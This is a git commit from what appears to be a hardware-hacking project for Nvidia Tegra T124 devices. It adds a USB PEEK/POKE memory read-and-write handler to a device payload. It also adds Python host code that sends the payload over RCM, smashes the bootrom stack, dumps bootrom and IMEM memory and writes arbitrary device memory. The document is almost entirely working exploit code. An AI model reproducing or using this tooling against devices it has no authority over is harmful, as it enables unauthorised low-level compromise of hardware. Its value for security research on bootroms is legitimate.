Added code that will do memdumping based on architecture, but code is not functioning well on the nvidia shield

This commit is contained in:
Eljakim Herrewijnen 2022-08-10 12:20:47 +02:00
parent 91797ccaf9
commit 926453f0ea
7 changed files with 75 additions and 8 deletions

View File

@ -35,7 +35,7 @@ void payload_main() {
usb_log("cmd_handler", &error_code);
while(1){
usb_read(&data, 4, &error_code);
if(data[0] == 'M' && data[1] == 'E' && data[2] == 'M' && data[3] == 'D') {
if(data[0] == 'P' && data[1] == 'E' && data[2] == 'E' && data[3] == 'K') {
usb_write(&data, 4, &error_code);
usb_read(&data, 8,&error_code); // Receive uint64_t size and and uint32_t offset
mem_off = *(uint32_t *)data;
@ -53,6 +53,27 @@ void payload_main() {
}
}
}
else if(data[0] == 'P' && data[1] == 'O' && data[2] == 'K' && data[3] == 'E') {
usb_write(&data, 4, &error_code);
usb_read(&data, 8, &error_code); // Receive uint64_t size and and uint32_t offset
mem_off = *(uint32_t *)data;
mem_sz = *(uint32_t *)(data+4);
for(unsigned int i=0;i<mem_sz;i+=0x200) {
if((mem_sz - i) < 0x200) {
blk_sz = mem_sz - i;
} else {
blk_sz = 0x200;
}
usb_read((void *) (mem_off + i), blk_sz, &error_code);
usb_log("OK", &error_code);
usb_read(&data, 4, &error_code);
if(!(data[0] == 'A' && data[1] == 'C' && data[2] == 'K')) {
break;
}
}
}
usb_log("done", &error_code);
}
}

Binary file not shown.

Binary file not shown.

BIN
bootrom_t124.bin Normal file

Binary file not shown.

BIN
dumped_ref0.bin Normal file

Binary file not shown.

View File

@ -107,7 +107,8 @@ class TegraRCM():
info(f"Done on {fd}")
return status
except Exception as e:
print(str(e))
pass
# print(str(e))
return None
def __init__(self):
@ -194,12 +195,11 @@ class TegraRCM():
self.dev.write(rcm_cmd_buf.read())
payload_file_fd.close()
def send_payload(self, payload):
def send_payload(self, payload, thumb=1):
'''
Sends user specified payload to device
'''
self.send_rcm_cmd(payload, 1)
self.send_rcm_cmd(payload, thumb)
#Smash the stack
status = self.ep0_read_unbounded(BOOTROM_SMASH_LEN)
@ -220,7 +220,7 @@ class TegraRCM():
error("Error on writing vbar!")
def memdump_region(self, offset, size):
if(not self.send_verify_cmd(b"MEMD")):
if(not self.send_verify_cmd(b"PEEK")):
return
mem_param = struct.pack('<LL', offset, size)
self.dev.write(mem_param)
@ -235,6 +235,44 @@ class TegraRCM():
received += d
self.handle_done()
return received
def memwrite_region(self, address, data, check=True):
'''
Write a blob of data to an address on the device. Sometimes this function has issues when writing more than 0x20 bytes of data
Args:
:param (int): address: Address to write to
:param (bytes): data: Binary data to write to the device
:param (Bool): check if data is really written by dumping the region and checking if it has changed
'''
size = len(data)
if(check):
before = self.memdump_region(address, size)
if(not self.send_verify_cmd(b"POKE")):
return
mem_param = struct.pack('<II', address, size)
self.dev.write(mem_param)
while len(data) > 0:
remaining = 0x200
if(len(data) < 0x200):
remaining = len(data)
send = data[:remaining]
data = data[remaining:]
self.dev.write(send)
message = self.dev.read(0x200)
if(message != b"OK"):
error("Error on writing data to device!")
return
self.dev.write(b"ACK\x00")
self.handle_done()
#Read back data
if(check):
after = self.memdump_region(address, size)
if(after == before and send != before):
error(f"Memory written succesfully, but no changes detected! | {hex(address)}")
def search_bootrom(self):
dumped = BytesIO()
@ -244,7 +282,7 @@ class TegraRCM():
if(cpsr_to_r0_ins in d or r1_to_cpsr in d):
info(f"Found cpsr instruction at {hex(i)}")
print(".", end="")
info(f"dumped {hex(len(dumped))} data")
# info(f"dumped {hex(len(dumped))} data")
def dump_bootrom(self):
d = self.memdump_region(0x100000, 0x1000)
@ -255,6 +293,7 @@ class TegraRCM():
while True:
cmd = self.dev.read(0x200)
if(cmd == b"cmd_handler"):
self.memwrite_region(0x40000000, 0x100 * b"\xaa")
self.search_bootrom()
#dump memory
self.dump_bootrom()
@ -263,9 +302,16 @@ class TegraRCM():
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("payload", help="Payload to send to the tablet")
parser.add_argument("--ga", help="Prepare for GA", action="store_true")
args = parser.parse_args()
rcm = TegraRCM()
rcm.dev.read_chip_id()
rcm.send_payload(args.payload)
rcm.cmd_handler()
if args.ga:
d = rcm.dev.read(4)
d2 = rcm.dev.read(0x200)
if d == b"GiAs":
ok("Device in GA debugger")
else:
rcm.cmd_handler()

BIN
imem_ref0_t124.bin Normal file

Binary file not shown.